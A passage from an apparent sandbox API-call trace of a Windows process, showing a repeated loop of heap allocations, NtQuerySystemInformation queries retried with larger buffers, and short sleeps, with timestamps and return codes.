hHeap=0x2560000) returned 1 [0288.909] Sleep (dwMilliseconds=0x110) [0288.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0288.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0288.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0288.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0288.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0288.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0288.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0288.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0288.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.945] Sleep (dwMilliseconds=0x110) [0288.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0288.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0288.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0288.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0288.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0288.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0288.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0288.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0288.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0288.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0288.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0288.993] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0288.993] Sleep (dwMilliseconds=0x110) [0289.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0289.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0289.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0289.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0289.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0289.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0289.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0289.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0289.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.020] Sleep (dwMilliseconds=0x110) [0289.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0289.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0289.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0289.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0289.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0289.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0289.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0289.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0289.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.035] Sleep (dwMilliseconds=0x110) [0289.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0289.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0289.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0289.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0289.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0289.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0289.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0289.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0289.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.050] Sleep (dwMilliseconds=0x110) [0289.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0289.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0289.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0289.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0289.090] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0289.090] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0289.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0289.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0289.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.096] Sleep (dwMilliseconds=0x110) [0289.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0289.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0289.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0289.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0289.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0289.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0289.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0289.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0289.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.194] Sleep (dwMilliseconds=0x110) [0289.246] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0289.246] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0289.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0289.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0289.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0289.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0289.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0289.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0289.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.251] Sleep (dwMilliseconds=0x110) [0289.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0289.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0289.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0289.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0289.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0289.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0289.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0289.274] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0289.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.283] Sleep (dwMilliseconds=0x110) [0289.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0289.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0289.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0289.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0289.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0289.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0289.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0289.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0289.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.300] Sleep (dwMilliseconds=0x110) [0289.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0289.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0289.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0289.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0289.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0289.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0289.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0289.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0289.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.333] Sleep (dwMilliseconds=0x110) [0289.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0289.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0289.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0289.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0289.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0289.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0289.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0289.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0289.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.347] Sleep (dwMilliseconds=0x110) [0289.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0289.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0289.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0289.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0289.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0289.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0289.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0289.368] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0289.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.369] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.369] Sleep (dwMilliseconds=0x110) [0289.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0289.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0289.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0289.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0289.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0289.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0289.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0289.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0289.376] RtlAllocateHeap 